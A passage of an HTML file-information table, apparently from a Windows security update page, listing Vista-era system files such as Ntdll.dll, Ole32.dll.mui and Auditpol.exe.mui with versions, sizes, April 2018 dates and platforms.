applicable</td></tr><tr><td>Msobjs.dll</td><td>6.0.6002.24367</td><td>58,880</td><td>28-Apr-2018</td><td>02:28</td><td>x64</td><td>Not applicable</td></tr><tr><td>Ntdll.dll</td><td>6.0.6002.24367</td><td>1,583,448</td><td>28-Apr-2018</td><td>02:33</td><td>x64</td><td>Not applicable</td></tr><tr><td>Oleaut32.dll</td><td>6.0.6002.24367</td><td>862,720</td><td>28-Apr-2018</td><td>02:28</td><td>x64</td><td>Not 
applicable</td></tr><tr><td>Ntoskrnl.exe</td><td>6.0.6002.24367</td><td>4,718,272</td><td>28-Apr-2018</td><td>02:50</td><td>x64</td><td>Not applicable</td></tr><tr><td>Rpcrt4.dll</td><td>6.0.6002.24367</td><td>1,308,160</td><td>28-Apr-2018</td><td>02:28</td><td>x64</td><td>Not applicable</td></tr><tr><td>Spsys.sys</td><td>6.0.6002.24298</td><td>354,816</td><td>23-Feb-2018</td><td>03:26</td><td>x64</td><td>Not applicable</td></tr><tr><td>Smss.exe</td><td>6.0.6002.24367</td><td>76,288</td><td>28-Apr-2018</td><td>01:54</td><td>x64</td><td>Not applicable</td></tr><tr><td>Ntvdm64.dll</td><td>6.0.6002.24367</td><td>16,896</td><td>28-Apr-2018</td><td>02:28</td><td>x64</td><td>AMD64_MICROSOFT-WINDOWS-WOW</td></tr><tr><td>Wow64.dll</td><td>6.0.6002.24367</td><td>234,496</td><td>28-Apr-2018</td><td>02:28</td><td>x64</td><td>AMD64_MICROSOFT-WINDOWS-WOW</td></tr><tr><td>Wow64cpu.dll</td><td>6.0.6002.24367</td><td>17,408</td><td>28-Apr-2018</td><td>02:28</td><td>x64</td><td>AMD64_MICROSOFT-WINDOWS-WOW</td></tr><tr><td>Wow64win.dll</td><td>6.0.6002.24367</td><td>301,568</td><td>28-Apr-2018</td><td>02:28</td><td>x64</td><td>AMD64_MICROSOFT-WINDOWS-WOW</td></tr><tr><td>Comcat.dll</td><td>6.0.6002.24367</td><td>7,168</td><td>28-Apr-2018</td><td>02:37</td><td>x86</td><td>Not applicable</td></tr><tr><td>Oleres.dll</td><td>6.0.6002.24367</td><td>23,552</td><td>28-Apr-2018</td><td>01:44</td><td>x86</td><td>Not applicable</td></tr><tr><td>Kernel32.dll</td><td>6.0.6002.24367</td><td>862,720</td><td>28-Apr-2018</td><td>02:37</td><td>x86</td><td>Not applicable</td></tr><tr><td>Ntdll.dll</td><td>6.0.6002.24367</td><td>1,168,840</td><td>28-Apr-2018</td><td>02:43</td><td>x86</td><td>Not applicable</td></tr><tr><td>Oleaut32.dll</td><td>6.0.6002.24367</td><td>574,464</td><td>28-Apr-2018</td><td>02:37</td><td>x86</td><td>Not applicable</td></tr><tr><td>Rpcrt4.dll</td><td>6.0.6002.24367</td><td>679,424</td><td>28-Apr-2018</td><td>02:37</td><td>x86</td><td>Not 
applicable</td></tr><tr><td>Acwow64.dll</td><td>6.0.6002.24367</td><td>43,520</td><td>28-Apr-2018</td><td>02:37</td><td>x86</td><td>WOW64_MICROSOFT-WINDOWS-WOW</td></tr><tr><td>Instnm.exe</td><td>6.0.6002.24367</td><td>7,680</td><td>28-Apr-2018</td><td>01:41</td><td>x86</td><td>WOW64_MICROSOFT-WINDOWS-WOW</td></tr><tr><td>Ntvdm64.dll</td><td>6.0.6002.24367</td><td>14,336</td><td>28-Apr-2018</td><td>02:37</td><td>x86</td><td>WOW64_MICROSOFT-WINDOWS-WOW</td></tr><tr><td>Setup16.exe</td><td>3.1.0.1918</td><td>26,112</td><td>28-Apr-2018</td><td>01:41</td><td>x86</td><td>WOW64_MICROSOFT-WINDOWS-WOW</td></tr><tr><td>User.exe</td><td>6.0.6002.24367</td><td>2,560</td><td>28-Apr-2018</td><td>01:41</td><td>x86</td><td>WOW64_MICROSOFT-WINDOWS-WOW</td></tr><tr><td>Wow32.dll</td><td>6.0.6002.24367</td><td>5,120</td><td>28-Apr-2018</td><td>02:37</td><td>x86</td><td>WOW64_MICROSOFT-WINDOWS-WOW</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>380,928</td><td>28-Apr-2018</td><td>03:49</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>389,120</td><td>28-Apr-2018</td><td>03:49</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>385,024</td><td>28-Apr-2018</td><td>03:51</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>385,024</td><td>28-Apr-2018</td><td>03:50</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>401,408</td><td>28-Apr-2018</td><td>03:48</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>266,240</td><td>28-Apr-2018</td><td>02:41</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>393,216</td><td>28-Apr-2018</td><td>03:59</td><td>Not applicable</td><td>Not 
applicable</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>385,024</td><td>28-Apr-2018</td><td>03:49</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>393,216</td><td>28-Apr-2018</td><td>03:58</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>376,832</td><td>28-Apr-2018</td><td>04:02</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>393,216</td><td>28-Apr-2018</td><td>03:48</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>389,120</td><td>28-Apr-2018</td><td>04:04</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>360,448</td><td>28-Apr-2018</td><td>03:59</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>360,448</td><td>28-Apr-2018</td><td>03:52</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>385,024</td><td>28-Apr-2018</td><td>04:03</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>389,120</td><td>28-Apr-2018</td><td>03:54</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>393,216</td><td>28-Apr-2018</td><td>04:02</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>389,120</td><td>28-Apr-2018</td><td>03:52</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>389,120</td><td>28-Apr-2018</td><td>03:49</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>393,216</td><td>28-Apr-2018</td><td>03:51</td><td>Not applicable</td><td>Not 
applicable</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>385,024</td><td>28-Apr-2018</td><td>03:50</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>385,024</td><td>28-Apr-2018</td><td>03:52</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>356,352</td><td>28-Apr-2018</td><td>03:58</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>348,160</td><td>28-Apr-2018</td><td>03:55</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Advapi32.dll</td><td>6.0.6002.24367</td><td>823,808</td><td>28-Apr-2018</td><td>02:37</td><td>x86</td><td>Not applicable</td></tr><tr><td>Ole32.dll</td><td>6.0.6002.24367</td><td>1,321,472</td><td>28-Apr-2018</td><td>02:37</td><td>x86</td><td>X86_MICROSOFT-WINDOWS-COM-BASE-QFE</td></tr><tr><td>Ole32.dll.mui</td><td>6.0.6002.24367</td><td>3,584</td><td>28-Apr-2018</td><td>03:43</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Oleres.dll.mui</td><td>6.0.6002.24367</td><td>24,576</td><td>28-Apr-2018</td><td>03:44</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ole32.dll.mui</td><td>6.0.6002.24367</td><td>3,584</td><td>28-Apr-2018</td><td>03:42</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Oleres.dll.mui</td><td>6.0.6002.24367</td><td>28,672</td><td>28-Apr-2018</td><td>03:43</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ole32.dll.mui</td><td>6.0.6002.24367</td><td>3,584</td><td>28-Apr-2018</td><td>03:44</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Oleres.dll.mui</td><td>6.0.6002.24367</td><td>28,672</td><td>28-Apr-2018</td><td>03:45</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ole32.dll.mui</td><td>6.0.6002.24367</td><td>3,584</td><td>28-Apr-2018</td><td>03:43</td><td>Not applicable</td><td>Not 
applicable</td></tr><tr><td>Oleres.dll.mui</td><td>6.0.6002.24367</td><td>32,768</td><td>28-Apr-2018</td><td>03:44</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ole32.dll.mui</td><td>6.0.6002.24367</td><td>4,096</td><td>28-Apr-2018</td><td>03:41</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Oleres.dll.mui</td><td>6.0.6002.24367</td><td>32,768</td><td>28-Apr-2018</td><td>03:42</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ole32.dll.mui</td><td>6.0.6002.24367</td><td>3,584</td><td>28-Apr-2018</td><td>02:36</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Oleres.dll.mui</td><td>6.0.6002.24367</td><td>28,672</td><td>28-Apr-2018</td><td>02:37</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ole32.dll.mui</td><td>6.0.6002.24367</td><td>3,584</td><td>28-Apr-2018</td><td>03:52</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Oleres.dll.mui</td><td>6.0.6002.24367</td><td>32,768</td><td>28-Apr-2018</td><td>03:53</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ole32.dll.mui</td><td>6.0.6002.24367</td><td>3,584</td><td>28-Apr-2018</td><td>03:42</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Oleres.dll.mui</td><td>6.0.6002.24367</td><td>28,672</td><td>28-Apr-2018</td><td>03:44</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ole32.dll.mui</td><td>6.0.6002.24367</td><td>3,584</td><td>28-Apr-2018</td><td>03:51</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Oleres.dll.mui</td><td>6.0.6002.24367</td><td>32,768</td><td>28-Apr-2018</td><td>03:52</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ole32.dll.mui</td><td>6.0.6002.24367</td><td>3,584</td><td>28-Apr-2018</td><td>03:56</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Oleres.dll.mui</td><td>6.0.6002.24367</td><td>24,576</td><td>28-Apr-2018</td><td>03:57</td><td>Not applicable</td><td>Not 
applicable</td></tr><tr><td>Ole32.dll.mui</td><td>6.0.6002.24367</td><td>3,584</td><td>28-Apr-2018</td><td>03:41</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Oleres.dll.mui</td><td>6.0.6002.24367</td><td>32,768</td><td>28-Apr-2018</td><td>03:43</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ole32.dll.mui</td><td>6.0.6002.24367</td><td>3,584</td><td>28-Apr-2018</td><td>03:57</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Oleres.dll.mui</td><td>6.0.6002.24367</td><td>32,768</td><td>28-Apr-2018</td><td>03:58</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ole32.dll.mui</td><td>6.0.6002.24367</td><td>3,584</td><td>28-Apr-2018</td><td>03:53</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Oleres.dll.mui</td><td>6.0.6002.24367</td><td>24,576</td><td>28-Apr-2018</td><td>03:54</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ole32.dll.mui</td><td>6.0.6002.24367</td><td>3,584</td><td>28-Apr-2018</td><td>03:47</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Oleres.dll.mui</td><td>6.0.6002.24367</td><td>20,480</td><td>28-Apr-2018</td><td>03:48</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ole32.dll.mui</td><td>6.0.6002.24367</td><td>3,584</td><td>28-Apr-2018</td><td>03:56</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Oleres.dll.mui</td><td>6.0.6002.24367</td><td>28,672</td><td>28-Apr-2018</td><td>03:57</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ole32.dll.mui</td><td>6.0.6002.24367</td><td>3,584</td><td>28-Apr-2018</td><td>03:48</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Oleres.dll.mui</td><td>6.0.6002.24367</td><td>32,768</td><td>28-Apr-2018</td><td>03:49</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ole32.dll.mui</td><td>6.0.6002.24367</td><td>3,584</td><td>28-Apr-2018</td><td>03:54</td><td>Not applicable</td><td>Not 
applicable</td></tr><tr><td>Oleres.dll.mui</td><td>6.0.6002.24367</td><td>32,768</td><td>28-Apr-2018</td><td>03:56</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ole32.dll.mui</td><td>6.0.6002.24367</td><td>3,584</td><td>28-Apr-2018</td><td>03:45</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Oleres.dll.mui</td><td>6.0.6002.24367</td><td>32,768</td><td>28-Apr-2018</td><td>03:46</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ole32.dll.mui</td><td>6.0.6002.24367</td><td>3,584</td><td>28-Apr-2018</td><td>03:42</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Oleres.dll.mui</td><td>6.0.6002.24367</td><td>32,768</td><td>28-Apr-2018</td><td>03:44</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ole32.dll.mui</td><td>6.0.6002.24367</td><td>3,584</td><td>28-Apr-2018</td><td>03:44</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Oleres.dll.mui</td><td>6.0.6002.24367</td><td>28,672</td><td>28-Apr-2018</td><td>03:46</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ole32.dll.mui</td><td>6.0.6002.24367</td><td>3,584</td><td>28-Apr-2018</td><td>03:43</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Oleres.dll.mui</td><td>6.0.6002.24367</td><td>28,672</td><td>28-Apr-2018</td><td>03:45</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ole32.dll.mui</td><td>6.0.6002.24367</td><td>3,584</td><td>28-Apr-2018</td><td>03:46</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Oleres.dll.mui</td><td>6.0.6002.24367</td><td>28,672</td><td>28-Apr-2018</td><td>03:47</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ole32.dll.mui</td><td>6.0.6002.24367</td><td>3,584</td><td>28-Apr-2018</td><td>03:52</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Oleres.dll.mui</td><td>6.0.6002.24367</td><td>20,480</td><td>28-Apr-2018</td><td>03:53</td><td>Not applicable</td><td>Not 
applicable</td></tr><tr><td>Ole32.dll.mui</td><td>6.0.6002.24367</td><td>3,584</td><td>28-Apr-2018</td><td>03:50</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Oleres.dll.mui</td><td>6.0.6002.24367</td><td>20,480</td><td>28-Apr-2018</td><td>03:51</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Adtschema.dll.mui</td><td>6.0.6002.24367</td><td>229,376</td><td>28-Apr-2018</td><td>03:47</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Auditpol.exe.mui</td><td>6.0.6002.24367</td><td>28,672</td><td>28-Apr-2018</td><td>03:48</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msaudite.dll.mui</td><td>6.0.6002.24367</td><td>159,744</td><td>28-Apr-2018</td><td>03:49</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msobjs.dll.mui</td><td>6.0.6002.24367</td><td>69,632</td><td>28-Apr-2018</td><td>03:46</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Adtschema.dll.mui</td><td>6.0.6002.24367</td><td>245,760</td><td>28-Apr-2018</td><td>03:47</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Auditpol.exe.mui</td><td>6.0.6002.24367</td><td>32,768</td><td>28-Apr-2018</td><td>03:48</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msaudite.dll.mui</td><td>6.0.6002.24367</td><td>176,128</td><td>28-Apr-2018</td><td>03:49</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msobjs.dll.mui</td><td>6.0.6002.24367</td><td>81,920</td><td>28-Apr-2018</td><td>03:45</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Adtschema.dll.mui</td><td>6.0.6002.24367</td><td>241,664</td><td>28-Apr-2018</td><td>03:49</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Auditpol.exe.mui</td><td>6.0.6002.24367</td><td>32,768</td><td>28-Apr-2018</td><td>03:50</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msaudite.dll.mui</td><td>6.0.6002.24367</td><td>167,936</td><td>28-Apr-2018</td><td>03:51</td><td>Not applicable</td><td>Not 
applicable</td></tr><tr><td>Msobjs.dll.mui</td><td>6.0.6002.24367</td><td>73,728</td><td>28-Apr-2018</td><td>03:47</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Adtschema.dll.mui</td><td>6.0.6002.24367</td><td>262,144</td><td>28-Apr-2018</td><td>03:48</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Auditpol.exe.mui</td><td>6.0.6002.24367</td><td>32,768</td><td>28-Apr-2018</td><td>03:49</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msaudite.dll.mui</td><td>6.0.6002.24367</td><td>167,936</td><td>28-Apr-2018</td><td>03:50</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msobjs.dll.mui</td><td>6.0.6002.24367</td><td>81,920</td><td>28-Apr-2018</td><td>03:46</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Adtschema.dll.mui</td><td>6.0.6002.24367</td><td>286,720</td><td>28-Apr-2018</td><td>03:46</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Auditpol.exe.mui</td><td>6.0.6002.24367</td><td>32,768</td><td>28-Apr-2018</td><td>03:47</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msaudite.dll.mui</td><td>6.0.6002.24367</td><td>196,608</td><td>28-Apr-2018</td><td>03:48</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msobjs.dll.mui</td><td>6.0.6002.24367</td><td>81,920</td><td>28-Apr-2018</td><td>03:44</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Adtschema.dll.mui</td><td>6.0.6002.24367</td><td>233,472</td><td>28-Apr-2018</td><td>02:40</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Auditpol.exe.mui</td><td>6.0.6002.24367</td><td>28,672</td><td>28-Apr-2018</td><td>02:41</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msaudite.dll.mui</td><td>6.0.6002.24367</td><td>155,648</td><td>28-Apr-2018</td><td>02:41</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msobjs.dll.mui</td><td>6.0.6002.24367</td><td>69,632</td><td>28-Apr-2018</td><td>02:39</td><td>Not applicable</td><td>Not 
applicable</td></tr><tr><td>Adtschema.dll.mui</td><td>6.0.6002.24367</td><td>274,432</td><td>28-Apr-2018</td><td>03:57</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Auditpol.exe.mui</td><td>6.0.6002.24367</td><td>32,768</td><td>28-Apr-2018</td><td>03:58</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msaudite.dll.mui</td><td>6.0.6002.24367</td><td>192,512</td><td>28-Apr-2018</td><td>03:59</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msobjs.dll.mui</td><td>6.0.6002.24367</td><td>77,824</td><td>28-Apr-2018</td><td>03:55</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Adtschema.dll.mui</td><td>6.0.6002.24367</td><td>237,568</td><td>28-Apr-2018</td><td>03:47</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Auditpol.exe.mui</td><td>6.0.6002.24367</td><td>32,768</td><td>28-Apr-2018</td><td>03:48</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msaudite.dll.mui</td><td>6.0.6002.24367</td><td>172,032</td><td>28-Apr-2018</td><td>03:49</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msobjs.dll.mui</td><td>6.0.6002.24367</td><td>77,824</td><td>28-Apr-2018</td><td>03:46</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Adtschema.dll.mui</td><td>6.0.6002.24367</td><td>290,816</td><td>28-Apr-2018</td><td>03:56</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Auditpol.exe.mui</td><td>6.0.6002.24367</td><td>32,768</td><td>28-Apr-2018</td><td>03:57</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msaudite.dll.mui</td><td>6.0.6002.24367</td><td>192,512</td><td>28-Apr-2018</td><td>03:58</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msobjs.dll.mui</td><td>6.0.6002.24367</td><td>77,824</td><td>28-Apr-2018</td><td>03:54</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Adtschema.dll.mui</td><td>6.0.6002.24367</td><td>221,184</td><td>28-Apr-2018</td><td>04:00</td><td>Not applicable</td><td>Not 
applicable</td></tr><tr><td>Auditpol.exe.mui</td><td>6.0.6002.24367</td><td>28,672</td><td>28-Apr-2018</td><td>04:01</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msaudite.dll.mui</td><td>6.0.6002.24367</td><td>147,456</td><td>28-Apr-2018</td><td>04:02</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msobjs.dll.mui</td><td>6.0.6002.24367</td><td>69,632</td><td>28-Apr-2018</td><td>03:59</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Adtschema.dll.mui</td><td>6.0.6002.24367</td><td>262,144</td><td>28-Apr-2018</td><td>03:46</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Auditpol.exe.mui</td><td>6.0.6002.24367</td><td>32,768</td><td>28-Apr-2018</td><td>03:47</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msaudite.dll.mui</td><td>6.0.6002.24367</td><td>180,224</td><td>28-Apr-2018</td><td>03:48</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msobjs.dll.mui</td><td>6.0.6002.24367</td><td>86,016</td><td>28-Apr-2018</td><td>03:44</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Adtschema.dll.mui</td><td>6.0.6002.24367</td><td>262,144</td><td>28-Apr-2018</td><td>04:02</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Auditpol.exe.mui</td><td>6.0.6002.24367</td><td>32,768</td><td>28-Apr-2018</td><td>04:03</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msaudite.dll.mui</td><td>6.0.6002.24367</td><td>176,128</td><td>28-Apr-2018</td><td>04:04</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msobjs.dll.mui</td><td>6.0.6002.24367</td><td>81,920</td><td>28-Apr-2018</td><td>04:00</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Adtschema.dll.mui</td><td>6.0.6002.24367</td><td>167,936</td><td>28-Apr-2018</td><td>03:57</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Auditpol.exe.mui</td><td>6.0.6002.24367</td><td>24,576</td><td>28-Apr-2018</td><td>03:58</td><td>Not applicable</td><td>Not 
applicable</td></tr><tr><td>Msaudite.dll.mui</td><td>6.0.6002.24367</td><td>118,784</td><td>28-Apr-2018</td><td>03:58</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msobjs.dll.mui</td><td>6.0.6002.24367</td><td>53,248</td><td>28-Apr-2018</td><td>03:56</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Adtschema.dll.mui</td><td>6.0.6002.24367</td><td>151,552</td><td>28-Apr-2018</td><td>03:50</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Auditpol.exe.mui</td><td>6.0.6002.24367</td><td>24,576</td><td>28-Apr-2018</td><td>03:51</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msaudite.dll.mui</td><td>6.0.6002.24367</td><td>110,592</td><td>28-Apr-2018</td><td>03:51</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msobjs.dll.mui</td><td>6.0.6002.24367</td><td>53,248</td><td>28-Apr-2018</td><td>03:49</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Adtschema.dll.mui</td><td>6.0.6002.24367</td><td>241,664</td><td>28-Apr-2018</td><td>04:00</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Auditpol.exe.mui</td><td>6.0.6002.24367</td><td>32,768</td><td>28-Apr-2018</td><td>04:02</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msaudite.dll.mui</td><td>6.0.6002.24367</td><td>163,840</td><td>28-Apr-2018</td><td>04:02</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msobjs.dll.mui</td><td>6.0.6002.24367</td><td>73,728</td><td>28-Apr-2018</td><td>03:59</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Adtschema.dll.mui</td><td>6.0.6002.24367</td><td>253,952</td><td>28-Apr-2018</td><td>03:52</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Auditpol.exe.mui</td><td>6.0.6002.24367</td><td>32,768</td><td>28-Apr-2018</td><td>03:54</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msaudite.dll.mui</td><td>6.0.6002.24367</td><td>176,128</td><td>28-Apr-2018</td><td>03:54</td><td>Not applicable</td><td>Not 
applicable</td></tr><tr><td>Msobjs.dll.mui</td><td>6.0.6002.24367</td><td>81,920</td><td>28-Apr-2018</td><td>03:51</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Adtschema.dll.mui</td><td>6.0.6002.24367</td><td>270,336</td><td>28-Apr-2018</td><td>03:59</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Auditpol.exe.mui</td><td>6.0.6002.24367</td><td>32,768</td><td>28-Apr-2018</td><td>04:01</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msaudite.dll.mui</td><td>6.0.6002.24367</td><td>188,416</td><td>28-Apr-2018</td><td>04:01</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msobjs.dll.mui</td><td>6.0.6002.24367</td><td>81,920</td><td>28-Apr-2018</td><td>03:58</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Adtschema.dll.mui</td><td>6.0.6002.24367</td><td>274,432</td><td>28-Apr-2018</td><td>03:49</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Auditpol.exe.mui</td><td>6.0.6002.24367</td><td>32,768</td><td>28-Apr-2018</td><td>03:51</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msaudite.dll.mui</td><td>6.0.6002.24367</td><td>192,512</td><td>28-Apr-2018</td><td>03:51</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msobjs.dll.mui</td><td>6.0.6002.24367</td><td>77,824</td><td>28-Apr-2018</td><td>03:48</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Adtschema.dll.mui</td><td>6.0.6002.24367</td><td>270,336</td><td>28-Apr-2018</td><td>03:47</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Auditpol.exe.mui</td><td>6.0.6002.24367</td><td>32,768</td><td>28-Apr-2018</td><td>03:49</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msaudite.dll.mui</td><td>6.0.6002.24367</td><td>192,512</td><td>28-Apr-2018</td><td>03:49</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msobjs.dll.mui</td><td>6.0.6002.24367</td><td>77,824</td><td>28-Apr-2018</td><td>03:46</td><td>Not applicable</td><td>Not 
